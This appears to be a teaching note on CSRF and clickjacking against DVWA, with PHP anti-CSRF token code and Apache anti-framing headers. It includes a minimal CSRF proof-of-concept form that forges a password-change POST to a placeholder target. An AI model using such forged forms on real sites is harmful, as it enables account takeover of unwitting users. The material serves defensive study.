A practical study of Cross-Site Request Forgery (CSRF) and Clickjacking: how each is exploited against DVWA (Damn Vulnerable Web Application), and which server-side countermeasures stop it. Note that the defense snippets below are fragments — the CSRF section only shows token generation, so the verification step a handler must perform is discussed in the comments.
<!-- CSRF exploit -->
<!--
  Proof-of-concept hosted on an attacker-controlled page. When a victim who is
  logged in to target.com submits it, the browser attaches target.com's session
  cookie to the cross-site POST and the password-change handler cannot tell the
  forged request from a legitimate one.

  NOTE(review): as written the form has no submit button and no script, so
  nothing is sent unless the victim (or an added auto-submit) triggers it.
  NOTE(review): action and field names are placeholders — they must match the
  target handler's real path and parameter names to do anything.
  NOTE(review): exploitability depends on the session cookie being sent
  cross-site; cookies marked SameSite=Lax/Strict (the default in current
  Chromium) are not attached to a cross-site POST, which is itself a mitigation.
-->
<form action="http://target.com/change-password" method="POST">
<input type="hidden" name="password" value="hacked">
</form>
<!-- Defense -->
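// Anti-CSRF token: 32 bytes from the OS CSPRNG, hex-encoded to 64 characters.
// NOTE(review): assumes session_start() has already run — without an active
// session the assignment below lands in a plain array that is lost after the request.
$token = bin2hex(random_bytes(32));
// Store the server-side copy; the page must also emit it in the form as
// <input type="hidden" name="csrf_token" value="..."> (HTML-escaped).
// A fresh token on every request invalidates forms still open in other tabs;
// use `$_SESSION['csrf_token'] ??= ...` instead if a per-session token is acceptable.
$_SESSION['csrf_token'] = $token;

/**
 * Validates the token submitted with a state-changing request.
 *
 * Generating a token protects nothing on its own: the handler must call this
 * before acting and refuse the request when it returns false. The comparison is
 * constant-time so the token cannot be recovered byte-by-byte through timing.
 *
 * @param string|null $submitted the value of the form's hidden csrf_token field
 *                               (e.g. $_POST['csrf_token'] ?? null)
 * @return bool true only when a token is stored in the session and matches exactly
 */
function csrf_token_is_valid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? null;
    // hash_equals() requires two strings; reject absent/empty input explicitly
    // rather than letting a missing field throw or compare against ''.
    if (!is_string($expected) || $expected === '' || !is_string($submitted) || $submitted === '') {
        return false;
    }

    return hash_equals($expected, $submitted);
}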
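# Anti-clickjacking: forbid every site, including our own origin, from framing
# the response. Requires mod_headers (a2enmod headers). "DENY" is correct unless
# the application legitimately frames itself, in which case use "SAMEORIGIN".
# "always" also stamps the header onto non-2xx responses (error pages); the plain
# "Header set" form only touches successful responses.
Header always set X-Frame-Options "DENY"
# Modern browsers prefer CSP frame-ancestors and ignore X-Frame-Options when it
# is present; sending both covers old and new browsers. If the application
# already emits a Content-Security-Policy, add frame-ancestors to that policy
# instead of overwriting it with "set".
Header always set Content-Security-Policy "frame-ancestors 'none'"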